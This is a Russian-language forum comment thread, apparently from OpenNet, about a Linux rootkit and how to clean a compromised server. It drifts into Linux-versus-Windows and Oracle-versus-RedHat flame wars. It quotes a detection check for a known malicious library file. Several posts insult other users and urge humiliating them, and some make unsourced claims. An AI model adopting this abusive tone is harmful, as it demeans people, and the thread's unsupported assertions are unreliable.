> полную и актуальную информацию вместо вёдер словесных помоев в разных направлениях.Как будто ужимки и прыжки тех, кто тут ужимается и прыгает, хоть как-то может приблизить к полной и актуальной информацией. Мне кажется, что без них разбираться в проблеме будет гораздо проще, а информация будет гораздо актуальнее.
Нет, я вполне допускаю, что я неправ, или даже сильно неправ. Но я понять не могу, какую пользу, кроме вреда, может нести чужой бездумный спам, в котором набор букв слабо коррелирует с текущей ситуацией. Мне только одно изречение про git явно сказало, что человеку дали задание говорить, а что именно говорить - не сказали. А уж кто ему его дал - тараканы в голове или пропаганда любви к мальчикам на форумах ...
> полную и актуальную информацию вместо вёдер словесных помоев в разных направлениях.И ещё - если не будет провокаций, то человека вежливее и милее меня вы даже не найдёте. :)
Но здесь вежливое общение скорее потакает этим людям, и только провоцирует их на большее зло, и делает этих людей хуже и несчастнее.
Человек должен осознавать ОТВЕТСТВЕННОСТЬ за свои поступки, и доносить ему это лучше всего тем способом, который он понимает.
Вообще говоря, таким как ты не надо хамить. Тебя надо просто банить. Но раз администрация добрая - обходимся теми средствами, что есть.
> Вообще говоря, таким как ты не надо хамить. Тебя надо просто банить.
> Но раз администрация добрая - обходимся теми средствами, что есть.как самокритично о себе.. заметте - хамить начали первые вы. а вас почему-то не забанили.
Администрация явно добрая.
> как самокритично о себе..Коллеги, кто мудрей -- тот пусть остановится первым.
>> как самокритично о себе..
> Коллеги, кто мудрей -- тот пусть остановится первым.Может просто всем уйти отсюда, потому что M$-хомячки теперь тут главные? Ну так объявите официально: "OpenNet - ресурс для обсирания OpenSource" - будет юридически оформлено то, что по факту и есть. Потому как так, как обсирают (при чём в 99% - явная ложь) здесь, неосирают нигде, даже на microsoft.com.
Ты думаешь интересно прбираться здесь сквозь испражнения M$-дибилов?
> Коллеги, кто мудрей -- тот пусть остановится первым.Извините, а модераторские обязанности вы выполнять не планируете? А то разглагольствовать про какой-то там пастинор (тут вроде не медфорум?) - это пожалуйста. А вот потереть хамоватые и откровенно провокативные сообщения от граждан с наездливыми никами - не пора ли уже?
>> Коллеги, кто мудрей -- тот пусть остановится первым.
> Извините, а модераторские обязанности вы выполнять не планируете?Выполняю в меру сил и возможностей, сейчас нагрузка больше обычной.
PS: вот и не надо отвечать гопникам словесно, вызывайте сразу {ми,по}лицию в тред. :)
>>> Коллеги, кто мудрей -- тот пусть остановится первым.
>> Извините, а модераторские обязанности вы выполнять не планируете?
> Выполняю в меру сил и возможностей, сейчас нагрузка больше обычной.
> PS: вот и не надо отвечать гопникам словесно, вызывайте сразу {ми,по}лицию в
> тред. :)Вообщето, номальная {ми,по}лиция, это та, которая следит за порядком, а не та, которую нужно вызывать (только для того, чтоьы она приехав, сказала "мальчики, не ссортесь", "будь умнее" и т.п.), а также та которая за сёр в общественном месте изолирует, а не поощряет его.
>> как самокритично о себе..
> Коллеги, кто мудрей — тот пусть остановится первым.это в корне неверный подход. гопников надо бить, иначе в варианте «ну, я же умней, я остановлюсь первым» отхватишь полновесных. от того, что некоторые гопники с огромным трудом научились кое-как читать и писать, они не перестали быть гопниками.
существо с невнятно-провокативным ником — гопник типичный. на любой конкретный вопрос с предложением подтвердить изрекаемый бред это существо или пишет «сам в гугле найди», или вообще молчит. единственный вариант общения с таким (ну, коли уж приходится) — оплёвывать и унижать. потому что вариант обучения при помощи бамбуковой палки — увы — недоступен.
p.s. по-моему, под этим ником не один скорбный главою пишет.
> существо с невнятно-провокативным ником — гопник типичный. на любой конкретный вопрос
> с предложением подтвердить изрекаемый бред это существо или пишет «сам в
> гугле найди», или вообще молчит. единственный вариант общения с таким (ну,
> коли уж приходится) — оплёвывать и унижать. потому что вариант обучения
> при помощи бамбуковой палки — увы — недоступен.Унижать дитё неразумное не стоит, потому что вырастет, и подумает, что все так делают, и что это такой порядок вещей. Нужно воспитывать.
Но! Когда методы удаления недоступны, а само не уходит, тогда, в малых дозах, под строгим присмотром врача, возможно введение некоторых препаратов. Во всём должна быть мера. А то воспитаем на свою голову тех, кто, когда ему чуть что-то не нравится, сразу будет изображать из себя обиженную Лигу Наций и начинать свои ковровые бомбардировки по любому пустяку.
Проблема сейчас только одна - всё завалено этим спамом. И тут что бей, что не бей... Претензия даже не к мифической тупости или мифическим оскорблениям, а в однообразии - у человеков нет вообще никакой своей мысли, никакого своего мнения, и они, с упорством, с которым они бы могли лично давно переписать все фотошопы на gtk,qt и fltk одновременно, постят сюда одно и то же. В 1500-й раз это начинает надоедать. И очень мешает обсуждать, собственно, новости.
> как самокритично о себе.. заметте - хамить начали первые вы.Нет, извините, хамить начали вы. Хотя-бы в вашем нике. Просто вы настолько закоренелое хамло что воспринимаете ваше хамство как данность. И вообще не обращаете на него внимание.
Запасаемся попкорном и ожидаем сначала шоу по выявлению заразы, а потом эпических батлов линуксоиды-против-виндузоидов, линуксоиды-против-фрибээсдешников. А в конце супер финал: линуксоиды-против-всех:D
Да щазз. Найдут, выпустят инструменты диагностики, апдейт, все заинтересованные пропатчатся и всё успокоится.
> Да щазз. Найдут, выпустят инструменты диагностики, апдейт,
> все заинтересованные пропатчатся и всё успокоится.Сломанным ещё переустанавливать начисто, перенося только данные и с контролем -- конфигурацию.
Или жить на пороховой бочке.
Разумеется. Та ещё возня...
> Разумеется. Та ещё возня...Тем более что правильная вычистка руткита требует высокой квалификации админа + детального знания работы конкретно этого руткита. Иначе может так оказаться что недобитый руткит втихаря себя восстановит, например.
реинсталл - это правильная вычистка руткита.
Да ладно. Если на серванте лежит стопицот терабайт баз и 200МБ собсно системы, то куда правильнее полечить побитое, а не гонять туда-сюда эти стопицот терабайт. Тем более, что это несложно, всего-то сверить хеши файлов с контрольной копией. Если не совпадают - менять на запаску. По большому счету, /бин, /сбин, /либ етц можно вообще держать тут же в криптованом архиве. Только грузиться нужно, разумеется, с чистого носителя, того же ливцд.
ну если у вас ваши "стопицот терабайт" терабайт лежат на том же разделе диска что и система (или её часть), то это ваши проблемы.
> Да ладно. Если на серванте лежит стопицот терабайт баз и 200МБ собсно
> системы, то куда правильнее полечить побитое, а не гонять туда-сюда эти
> стопицот терабайт. Тем более, что это несложно, всего-то сверить хеши файлов
> с контрольной копией. Если не совпадают - менять на запаску.руткит - это когда нет основания доверять системе. в том числе в плане "совпадает/не совпадает контрольная сумма"
> По большому счету, /бин, /сбин, /либ етц можно вообще держать тут же
> в криптованом архиве. Только грузиться нужно, разумеется, с чистого носителя, того
> же ливцд.то, что вы описали, мало чем отличается от реинсталла.
> стопицот терабайт. Тем более, что это несложно, всего-то сверить хеши файлов
> с контрольной копией. Если не совпадают - менять на запаску.А если руткит не тупой и подсовывает правильные копии файлов? Тогда чего? Этот фокус умели даже совершенно доисторические вири под дос, между прочим.
А, блин, читать надо до конца :(> Только грузиться нужно, разумеется, с чистого носителя, того же ливцд.
Ну тогда и отличий от реинсталла будет минимум. Ну гемора будет побольше. А ради чего - хз.
собственно я о том же
>> стопицот терабайт. Тем более, что это несложно, всего-то сверить хеши файлов
>> с контрольной копией. Если не совпадают - менять на запаску.
> А если руткит не тупой и подсовывает правильные копии файлов? Тогда чего?
> Этот фокус умели даже совершенно доисторические вири под дос, между прочим.так дя этого фокуса надо чтобы система была под управлением трояна, а в нашем 2013 после руткита все действия проверки и восстановления делают с лайвсиди или подобным способом.
> с лайвсиди или подобным способом.Ну так проще всего вкатить оттуда снос всего и вся + реинсталл. А то недоглядишь какую-нибудь мелкую пакость и оно оттуда воскреснет. А оно надо?
> реинсталл - это правильная вычистка руткита.Раньше над виндузятниками смеялись, что те (к стати успешно) борются с любыми проблемами с помощью переустановки.
>> реинсталл - это правильная вычистка руткита.+1
> Раньше над виндузятниками смеялись, что те (к стати успешно) борются
> с любыми проблемами с помощью переустановки.Разницу между "любыми проблемами" и отработавшим руткитом -- осознаёте?
Вне зависимости от используемой ОС _единственный_ известный мне правильный метод возвращения хоста, на котором получили полные привилегии, в работу -- это установка бинарников с нуля, перенос данных и (с проверкой глазами/скриптами как минимум в местах вроде /etc/passwd) конфигурации, лучше из бэкапа, чем с (по возможности отложенной в сторонку для возможности более внимательного изучения) ФС по состоянию на момент отключения хоста от средств коммуникации.
>> реинсталл - это правильная вычистка руткита.
> Раньше над виндузятниками смеялись, что те (к стати успешно) борются с любыми
> проблемами с помощью переустановки.И правильно смеялись.
> "Два утра". Пьеса без действия. <Захотелось мне, например, с утра начать новую жизнь. Снести всё ненужное, всё, что уже неактуально, всё, что пробовалось, но не пригодилось (и сами приложения, и настройки). Чтобы не разбираться с существующим - поставить с нуля и потом добавлять "нужное по требованию".
РЕЗЕРВИРОВАНИЕ.У меня вся система из репозитория, а арч из двух - стандартного и собствеенного, который есть как минимум на двух сетевых носителях. Мне нужно задумываться только о сохранности данных, но у меня об этом думает hg, кроме резервирования обеспечивая меня ещё какими-то плюшками.
В windows же я не могу сказать в одно слово "система, стань, как вчера". Мне нужно будет регулярно ОТВЛЕКАТЬСЯ ОТ ОСНОВНОЙ задачи, чтобы заниматься резервированием приожений, данных в бинарных форматах реестра, и так далее. Если я что-то пропустил, или оказался в неродных условиях, мне нужно делать всё с нуля.
Ужасное, утомительное и рутинное действие.
ПЕРЕУСТАНОВКА.Я просто делаю debootstrap, pacstrap или installpkg --root /mnt/sda92 /srv/sl14/a/*.t?z
Можно даже из рабочей системы, пульнул и забыл. Потом вернулся, поправил fstab, locale, localtime, и добавил в загрузчик вручную или автоматически. Всё, для всего остального существует пакетный менеджер.Это не так, чтобы час пялиться в окна установщика, отвечать на неинтересные вопросы, а на выходе получить систему с косынкой, где всё только начинается. Вот честно, когда я последний раз поставил свою занюханную копию XP, и представил, сколько всего сейчас предстоит сделать, чтобы этим пользоваться, и сколько рутинных однообразных действий предстоит сделать, я просто удалил эту установленную копию. Потому что НЕИНТЕРЕСНО.
ДАННЫЕ.Я открываю в mc две панели, одну со старым home, другую с новым. И для тех приложений, которые мне понадобятся, просто делаю 'i like to move it, move it'.
В винде - всё разбросано по папкам, хомякам, реестрам. Как в этом хаосе выбрать только нужное? Практически нереально. Особенно в реестре с миллионом записей, 99.5% которых вообще не интересуют.
ДОГОНКА.Я нажимаю в mc ENTER на zip.zip, а мне говорят "unzip не найден". "Какой ужас", в притворстве пугаюсь я, делаю pacman -S unzip-beta, и через 20 секунд уже использую этот архив. Забыл что-то поставить, pacman -S и apt-get install решат все проблемы.
В винде я натыкаюсь на архив 7z, говорю мля, иду подключаться к интернету (иногда это тоже требует решить несколько проблем), зайти на сайт (иногда это требует предварительно выбрать браузер), скачать, ответить на серию неинтересных вопросов. И так 70 раз, и по кругу, и по кругу, и за...сь, о....ть не встать и вообще ура.
ВЫВОД.Переустановка делается быстро, гибко, и не приносит дискомфорта.
Переустановка винды требует серьёзной подготовки ДО, и серьёзной свистопляски ПОСЛЕ. Гибкостью и не пахнет. Пахнет мучениями и нафталином.
ПРОЧЕЕ.Кроме того, у меня с 1 дня серьёзного использования linux было суровое правило транзакционности - я не использую конкретную систему, пока не получу копию локального репозитория.
И потом уже "хоть мне зной, хоть мне дождик проливной", и выбивание из интернета хоть на три дня не собъёт меня с мысли - я буду продолжать делать то, что делал, а не отвлекаться с одной задачи, которая у меня в голове, на задачу, которую мне не хочется решать. И у меня в пакетах есть документация, и мне не нужно ждать интернета, чтобы посмотреть где-то на задворках сети нужный ключик в реестре. :)
Описано всё чётко, за исключением того, что у вантузятников есть "точки отката" и козырной ход "восстановление из акрониса". Проблем не решает полностью, но степень кошмара несомненно снижает.
> Описано всё чётко, за исключением того, что у вантузятников есть "точки отката"Особенно смешно когда вирье попадает в system protected files и авер тщетно пытается его оттуда удалить. Система очень стойко обороняет вирусы от удаления, не забывая восстанавливать измененную "негодяем"-антивирусом копию файла обратно на завирусованную версию. Очень забавная картинка, я бы сказал :)
> и козырной ход "восстановление из акрониса".
А кто будет мухлевать - будем бить по наглой рыжей морде. Акронис это вообще сторонняя коммерческая программа. Она стоит денег и вообще прелполагается что ее где-то взяли.
И главное не понятно вот что: почему это преподносится как "козырь"? В других системах подобные фортели можно даже встроенными утилитами откалывать, не платя каким-то отдельным личностям за коммерческую программу. В чем козырность то заключается?
>> Описано всё чётко, за исключением того, что у вантузятников есть "точки отката"
> Особенно смешно когда вирье попадает в system protected files и авер тщетно
> пытается его оттуда удалить.Или не тщетно.
> версию. Очень забавная картинка, я бы сказал :)
забавная. и?
>> и козырной ход "восстановление из акрониса".
> Акронис это вообще сторонняя коммерческая программа. Она стоит денег и вообще прелполагается что ее где-то взяли."акронис" в данном случае собирательный образ. ну clonezilla. или акронис купили - ппочему нет?
> И главное не понятно вот что: почему это преподносится как "козырь"?
позволяет не вникать в суть проблем - просто откатился и всё.
> Да щазз. Найдут, выпустят инструменты диагностики, апдейт, все заинтересованные пропатчатся
> и всё успокоится.для диагностики уже выпустили.
=>Added new LF_EXPLOIT check SSHDSPAM to check for the existence of
/lib64/libkeyutils.so.1.9 or /lib/libkeyutils.so.1.9..
только как защититься - не понятно.
По вашей же ссылке видно, что есть вариант, в котором библиотека называется по-другому.
> только как защититься - не понятно.поставить винду.
> поставить винду.Не, лучше minix. Там shared libs нет. Прикинь как хакеры обломаются?! Вот хочешь ты шаред либ вгрузить, а система так просто не умеет. Ололо.
А затем вторая, потом n-ая часть марлезонского балета :-)
только вантузячнеки помалкивают о фичах восьмёрки, которая может отправлять втихаря данные о корректности ключей всего установленного софта. хотя нет, они не помалкивают, абсолютное большинство элементарно не знают.пропиретарщики подождут немного, а потом массово начнут нагибать кулхацкеров и их "клиентов", выставляя счета. вот где много попкорна понадобится.
такая вот селяви, просто жуть
> только вантузячнеки помалкивают о фичах восьмёрки, которая может отправлять втихаря данные
> о корректности ключей всего установленного софта. хотя нет, они не помалкивают,
> абсолютное большинство элементарно не знают.
> пропиретарщики подождут немного, а потом массово начнут нагибать кулхацкеров и их "клиентов",
> выставляя счета. вот где много попкорна понадобится.
> такая вот селяви, просто жутьСеляви из разряда "а у вас негров линчуют".
а вы тоже не знали, или из кулхацкеров будете?
> а вы тоже не знали, или из кулхацкеров будете?Мне пофигу. У меня на серверах Солярис 10.
> Мне пофигу. У меня на серверах Солярис 10.Действительно - при этом будут другие проблемы. С политикой оракла - никаких троянов не надо: враг уже внутри.
только для нищебродов которым обновления нужны на халяву.
Кстати - вы не подскажете - давно RedHat разрешил на халяву использовать обновления своего дистрибутива?
Что-то я не помню большой волны возмущения когда они закрыли бинарные пакеты..
А вот против Oracle - дикая обида за тоже..Мисье лицемер?
>не помню большой волны возмущения когда они закрыли бинарные пакеты..лицемер в своём глазу бревны не заметил, т.к. ты желаемое за действительное выдаёшь. или память у тебя сильно короткая, либо ты просто туповат.
>нищебродово, да. это в стиле вани и поллитрухина. месье папенькин сыночек, или просто тут студентик из MicroSoft Student Partners пытается пальцами гнуть?
О да.. Оракл закрыл бинарные обновления на OpenNet были толпы возмущенных - которым на халяву перестали давать пакеты.Когда RedHat сказал - фик вам а не пакеты - где эти толпы?! Не видел.. все проглатили и стали рассказывать как redhat хорошо вкладывается в opensource. Так Oracle тоже не меньше вкладывает..
Только почему-то Oracle не хвалят.. А RedHat который так же обновления денег хочет - пытаются хвалить.
Надеятесь на скидку от RedHat?
> Только почему-то Oracle не хвалят.. А RedHat который так же обновления денег
> хочет - пытаются хвалить.
> Надеятесь на скидку от RedHat?Ммм... моя скидка от RH = CentOS. WTF?
> Так Oracle тоже не меньше вкладывает..
> Только почему-то Oracle не хвалят..Почитать где-то можно? А то на слуху больше как Оракл закрывает купленное, а шапка открывает.
> Только почему-то Oracle не хвалят..Оракл хорошего делает ещё меньше, чем редхат, а плохого -- ещё больше. Вот и вся разница.
PS re #477: он не MSSP, а когда-то работал в Sun, затем в Oracle, а героически отмазать последний и перевалить на шляпу старается до сих пор зачем-то.
Шигорин,Оракл делает мало? закрыает?
Пардоньте - все что закрыто за последнее время - это тесты к MySQL. по вполне себе адекватным причинам.
И закрыты бинарные пакеты к Solaris - которые кстати у шапки тоже закрыты.
Более того - шапка в своей EULA - запрещает установку триальных версий на систему с более чем 2мя сокетами. И весьма мутный момент на счет вообще установки их пакетов на большее число систем чем указано в лицензии.Так зачто любить то?
> Шигорин, Оракл делает мало?Хорошего -- мало.
> закрыает?
Да, и много. Или гробит.
> Пардоньте - все что закрыто за последнее время - это тесты к
> MySQL. по вполне себе адекватным причинам.Спасибо, теперь я как майнтейнер MySQL в альте всерьёз раздумываю оставить его "про запас" и передать приоритет MariaDB (сборка уже давно есть).
> Так зачто любить то?
У меня есть причины уважать и шляпу, и оракл -- но причин недолюбливать и избегать их обоих ещё больше, увы. В основном из-за того плохого, что они делают.
>> Пардоньте - все что закрыто за последнее время - это тесты к
>> MySQL. по вполне себе адекватным причинам.
> Спасибо, теперь я как майнтейнер MySQL в альте всерьёз раздумываю оставить его
> "про запас" и передать приоритет MariaDB (сборка уже давно есть).В опёнке уже полным ходом тестируется переезд на MariaDB. :) В 5.4 MySQL, скорее всего, просто выпилят, оставив путь для миграции. Ибо в Oracle слишком долго и мутно чинят баги, в том числе секурные.
> только для нищебродов которым обновления нужны на халяву.Ах, сколько батхерта в этом звуке. Какие помпезные оправдания. Прямо любо-дорого смотреть.
> Кстати - вы не подскажете - давно RedHat разрешил на халяву использовать
> обновления своего дистрибутива?У линукса есть коронное преимущество: это не театр одного актера, поэтому там возможна туева хуча вариантов. Без стопроцентной зависимости от придури одного конкретного вендора. Это очень важная для меня фича. Потому что если мне не нравится политика одного дистра - я могу выбрать другой. С другой политикой. Проголосовав ногами/баблом/... .
> Что-то я не помню большой волны возмущения когда они закрыли бинарные пакеты..
Наверное потому что редхат соблюдает GPL как и все остальные и не является чем-то таким особо-привилегированным. А сани и оракл всегда хотели ставить себя выше других, в том числе и зажимонами ядерных компонентов. Ну и закончилось это тем что жлобы сами себя и обжлобили в результате. Куда и дорога. Вот кого мне не жаль - так это жадных будаков.
> А вот против Oracle - дикая обида за тоже..На оракль нет дикой обиды. Есть просто элементарное понимание что влопываться в д@рьмо - неприятно. А зависимость от 1 вендора без внятных альтернатив и даже без просто полного сорца ядра системы - это знатное влипание в д@рьмо. Дураков нет, ищите их в другом месте.
> Мисье лицемер?
Очень актуальный вопросец при вашем нике, я бы сказал. Походу да, вы лицемер. Ну и просто несмеяна которая страдает батхертом по поводу того что отходы мозговой деятельности вашего оракла теперь никому нафиг не упали. Тем более что оракл своими мегаконскими условяими окончательно узаконил такое положение дел. А то что вы в это вляпались - к счастью останется только вашими проблемами. И моими проблемами не будет. Очень приятно это осознавать.
>> а вы тоже не знали, или из кулхацкеров будете?
> Мне пофигу. У меня на серверах Солярис 10.А у меня на серверах спектрумы и мне пофигу на все ваши эксплоиты.
напомнило: а мне пофигу, у меня шапочка на вате
но ведь шерстят, даже без фич для слива. причём, просто приходят и говорят: доказывайте, что софт у вас не ворованный. это как "доказывайте, что вы не убили никого этим перочинным ножом". абсурд, но таковы реалии. народ на линуксе работает, а с них даже в этом случае квитанцию требуют.
Шерстят фирмы
знаю, что фирмы. зато теперь открывается прекрасная возможность конкретному человеку предъявить конкретный список. тут даже показательные разборки с Поносовым покажутся детским садом.
> вендузятники люди цивилизованные, и софт как правило покупают. Что это в России
> не совсем так, так во-первых это Россия, а во-вторых чистить российских
> нищебродов никому нафиг не упало :-)угу именно поэтому большинство вареза и кейгенов именно для винды :)
это наверное покупалка не выросла? ;)
> А патаму шта под линапс нормального софта нет, подо что кейгены то
> делать ? :-)В венде даже нормального ядра нет. Я уже не говорю о каких-либо гарантиях.
> В венде даже нормального ядра нет. Я уже не говорю о каких-либо
> гарантиях.Она и "без ядра" уделывает линапс на декстопах как котенка :-)
А что, линус или GPL выдают гарантию ? :-)
обделывает
> обделываетОбделывают то, что можно обделывать :-)
> А что, линус или GPL выдают гарантию ? :-)Нет, просто там отказ от гарантий точно такой же как и везде. А если нет разницы - зачем платить больше? :)
>А что, линус или GPL выдают гарантию ? :-)Не, я, понятно, для работы Слаку использую давно уже. Многа лет, можно сказать. С тех пор что, Мелкомягкие там, Ябблы всякие, Бзди разные, какие-то гарантии работоспособности своей системы давать начали???
> Не, я, понятно, для работы Слаку использую давно уже. Многа лет, можно
> сказать. С тех пор что, Мелкомягкие там, Ябблы всякие, Бзди разные,
> какие-то гарантии работоспособности своей системы давать начали???А какие гарантии дает Патрегх ? :-) Я сам, допустим, сейчас пишу из под нее же. Бздю то за что пнул ? :-)
> А какие гарантии дает Патрегх ? :-) Я сам, допустим, сейчас пишу
> из под нее же. Бздю то за что пнул ? :-)А чем они такие из себя неприкасаемые? В общем то в плане гарантий все одинаковы: пишут AS IS и все такое :)
>> Не, я, понятно, для работы Слаку использую давно уже. Многа лет, можно
>> сказать. С тех пор что, Мелкомягкие там, Ябблы всякие, Бзди разные,
>> какие-то гарантии работоспособности своей системы давать начали???
> А какие гарантии дает Патрегх ? :-) Я сам, допустим, сейчас пишу
> из под нее же. Бздю то за что пнул ? :-)Вот об том и речь - никто никаких гарантий не дает. А то сообщение за нумером 243 (показать пальцем чье? :) ) вообще-то читается, что "винда" дает какие-то гарантии. А если такого преимущества нет, то на кой хрен она нужна, с учетом, что платная, чай не бухгалтера?
З.Ы. Бздю пнул до кучи, шоб никому обидно не было.
>Она и "без ядра" уделывает линапс на декстопах как котенка :-)
>А что, линус или GPL выдают гарантию ? :-)Она и "без ядра" уделывает линапс/она чуть что - уделывается; fixed
а что деньги давать без гарантии нынче модно? - так обычно при грабежах принято ;)
> Она и "без ядра" уделывает линапс/она чуть что - уделывается; fixed
> а что деньги давать без гарантии нынче модно? - так обычно при
> грабежах принято ;)Сходи на форумы бубунтоидов или арчеводов - услышишь много интересного :-)
> Сходи на форумы бyбyнтоидов или арчеводов - услышишь много интересного :-)Не помню чтобы за арч или убунту денег требовали. А вот если ты винду себе бесплатно поставишь - тебя пиратом обзовут и вообще, спасибо если не линчуют. Не говоря уж о том тчо даже кастомизированная сборка под свои нужды - это уже грубое нарушение EULA. Во пипец. Получается что у перечисленных система не только дешевле ($0) но и условия лицензирования явно лучше.
> Не помню чтобы за арч или убунту денег требовали. А вот если
> ты винду себе бесплатно поставишь - тебя пиратом обзовут и вообще,
> спасибо если не линчуют. Не говоря уж о том тчо даже
> кастомизированная сборка под свои нужды - это уже грубое нарушение EULA.
> Во пипец. Получается что у перечисленных система не только дешевле ($0)
> но и условия лицензирования явно лучше.Если все так хорошо, по почему у нее только 1% десктопа ?
> Если все так хорошо, по почему у нее только 1% десктопа ?Если умным быть несоизмеримо лучше, то почему вы все такие тупые?
> Если все так хорошо, по почему у нее только 1% десктопа ?Наверное потому что кое-кто вовремя подсуетился и подмял под себя OEMов. Тем не менее, эта пирамида начинает разваливаться, т.к. основное рубилово бабла теперь не там, а в мобильном сегменте MS вообще ноль без палочки. А ОЕМы таки хотят бабла. MS им этого обеспечить не может, по поводу чего их влияние на отрасль стремительно падает.
> Наверное потому что кое-кто вовремя подсуетился и подмял под себя OEMов. Тем
> не менее, эта пирамида начинает разваливаться, т.к. основное рубилово бабла теперь
> не там, а в мобильном сегменте MS вообще ноль без палочки.
> А ОЕМы таки хотят бабла. MS им этого обеспечить не может,
> по поводу чего их влияние на отрасль стремительно падает.Десктопы никуда не денутся, несмотря на очередные похороны. Работать на планшетниках просто тупо неудобно.
Что же касается отставания мелкософта в мобильном сегменте, она изначально,начиная еще с екселя для маков, отставала, а потом как то набирала очки. Что не станет безоговорочным лидером в мобильном сегменте, так времена уже несколько другие, но и ставить на ней крест еще рановато.
вот и выросло очередное поколение школоты, которая шиндошс хоронит. лол
> вот и выросло очередное поколение школоты, которая шиндошс хоронит. лолВы в своём праве держать разлагающийся труп в доме, а мы уж по старинке.
так это ж бсдшник, им не привыкать.
> А патаму шта под линапс нормального софта нет, подо что кейгены то делать ? :-)Если убрать все промежуточные сообщения, получится, что товарищ спорит сам с собой. Бывают "без царя в голове", а эти "с баллмером в голове", и крышу сносит начисто.
>> угу именно поэтому большинство вареза и кейгенов именно для винды :)
>> это наверное покупалка не выросла? ;)
> А патаму шта под линапс нормального софта нет, подо что кейгены то
> делать ? :-)как-то это не соответствует нормальности, честности, элитности...
а скорее доказывает (практически) - масса людей пользующих винду - готовы украсть, обмануть, переложить расходы на других (цена винды, на компах фирмы так или иначе включена в цену товара)
и оправдывать это наличием софта - жалкая отмазка
"нормального софта" - это типа п..женый? - я правильно понял?
Это в России делают, и то далеко не все. Всё больше теперь покупают просто потому что так проще и надежнее. А "элитность" вообще налево и за угол :-)
> Это в России делают, и то далеко не все. Всё больше теперь
> покупают просто потому что так проще и надежнее. А "элитность" вообще
> налево и за угол :-)просто так проще... потреблять и надежней... ничего не производить ;)
> просто так проще... потреблять и надежней... ничего не производить ;)Вот ты тыж ежж :-) По моим наблюдениям больше всего о "философии линукса и СПО" разоряются те, кто тупо ставит старье их реп, приготовленное косорукими майтейнерами :-)
> приготовленное косорукими майтейнерами :-)А судьи кто?
> А судьи кто?Я когда портрировал portage c примочками на слаку, полез проверять что я же там получил. Ёё.. мой любимый worker годичной давности, многое остальное такой же степени свежести. Не говоря уже про то что worker собран криво.
Даже среди вендузятников не встречал таких идиотов, которые дошли до того, что стали-бы покупать проприетарный софт.
> Даже среди вендузятников не встречал таких идиотов, которые дошли до того, что
> стали-бы покупать проприетарный софт."У каждого своя компания" © :-) Знакомые вендузятники его именно покупают, от самой венды и офиса до других прог. Поверь "так проще жить" :-)
>> Даже среди вендузятников не встречал таких идиотов, которые дошли до того, что
>> стали-бы покупать проприетарный софт.
> "У каждого своя компания" © :-) Знакомые вендузятники его именно покупают, от
> самой венды и офиса до других прог. Поверь "так проще жить"
> :-)покупать на свои или за чужие?
если фирма - за чужие, сверх прибыль - можно бездарно тратить
Да нет, для себя Это не нищеброды с репами, в которых старье и косорукие майтнейнеры :-)
> Да нет, для себя Это не нищеброды с репами, в которых старье и косорукие майтнейнеры :-)Какой бездарный и жирный троллинг. Смотрим, найдется ли хоть 1 идиот который на него купится.
>> Да нет, для себя Это не нищеброды с репами, в которых старье и косорукие майтнейнеры :-)
> Какой бездарный и жирный троллинг. Смотрим, найдется ли хоть 1 идиот который
> на него купится.а он нашелся! в #395 же;-)
> только вантузячнекиполомали линукс, но обязательно надо упомянуть венду. поломали линукс, но обязательно надо упомянуть фрю. обязательно пните iOS и ещё что нибудь, не имеющее к теме никакого отношения. упоминайте громче и чаще - возможно уязвимость после этого зарастёт и рассосётся.
Хотя по факту вопли эти они прекрасны. обычный дискурс "мы лучше всех" подменяется "мы не хуже остальных".
>> только вантузячнеки
> поломали линукс, но обязательно надо упомянуть вендуНе венду, а вендузятников.
> Хотя по факту вопли эти они прекрасны. обычный дискурс "мы лучше всех" подменяется "мы не хуже остальных".Не спрашивай, по ком звонит колокол. Спроси лучше, почему эти альтернативно развитые вообще на опеннете. Какими бы "благовидными" причинами они свои сублимации не скрывали, факт остаётся фактом, это их тянет на опеннет. А их отговорки обычно разделяются на демонстрирующие какую-то болезненную неполноценность и просто нелепые.
Если кто-то тратит своё время, пытаясь обидеть свободное - это признание. И чем громче и нелепее вопли прибывающих, тем сильнее признание.
> Спроси лучше, почему эти альтернативно развитые вообще на опеннете.Постановка вопроса "что вы делаете в нашем районе" не самая лучшая. Гораздо интереснее: "как вы себя ведёте", но тут же выяснится, что долб*бов с "правильной линукс-ориентацией" как минимум никак не меньше. И всё бы ничего, но опенсорс это не только линукс.
> Если кто-то тратит своё время, пытаясь обидеть свободное - это признание.
(задумался о спорах GPL vs BSD, GPL vs all) хорошо бы, чтобы вы полностью осознали вами сказанное.
> упоминайте громче и чаще - возможно уязвимость после этого зарастёт и рассoсётся.Для начала надо бы определить что уязвимость вообще именно в линуксе. А не в либах, черти-каком софте и прочая.
> подменяется "мы не хуже остальных".
Ну как бы идеализировать секурность любой системы вредно. Ведет к тому что потом при первом же взломе все дружно припоминают. С файрфоксом когда-то была такая история. Перцы пиарились что мол, секурнее, блaбла. А как пришла популярность и дыры стали чинить - как-то пришлось забыть об этом. Что не отменяет того факта что граждане платят за поиск дыр + довольно оперативно фиксят их. Так что общая секурность намного лучше того же IE, например. Сугубо глядя на массовые поимения через второй и отсутствие таковых через первый.
> пропиретарщики подождут немного, а потом массово начнут нагибать кулхацкеров и их
> "клиентов", выставляя счета. вот где много попкорна понадобится.
> такая вот селяви, просто жутьДанные о пользователе и данные о корректности установленных ключей это трохи разные вещи, не? Нарушения приватности есть только в первом случае.
И вообще, за счет пиратских вендов и офисов МС стал де-факто стандартом в госструктурах РФ, и сейчас стрижет бабло, продавая их дела пачками в разбогатевшие министерства и ведомства. Так что тут ВНЕЗАПНО В КАНДАЛЫ не будет
Указанные панели доставляют или собирают из исходников кучу всякого барахла, еще не понятно
виноват ли RHEL/CentOS.
> Указанные панели доставляют или собирают из исходников кучу всякого барахла, еще не
> понятно виноват ли RHEL/CentOS.А это культура такая. Если условный Вася, который тут вечно хает свободное и признаётся в поклонении проприетарному, завтра подхватит на Linux проблему через закладку в проприетарной игре, виноват будет Linux.
Можно иметь 99.99% защищённых пакетов, и огромный вход в стене - и тогда защищённость остальных 99.99% пакетов не будет иметь никакого смысла.
> Можно иметь 99.99% защищённых пакетов, ...И нетадмин из Хорватии это подтверждает:
http://www.webhostingtalk.com/showpost.php?p=8566821&postcou...Вывод:
Использование проприетарного клозет-source шлака дело геморное и непредсказуемое.
>> Можно иметь 99.99% защищённых пакетов, ...
> И нетадмин из Хорватии это подтверждает:
> http://www.webhostingtalk.com/showpost.php?p=8566821&postcou...Кикимор я не понимаю. Что там, чем всё кончилось, они поженились?
> Указанные панели доставляют или собирают из исходников кучу всякого барахла, еще не
> понятно
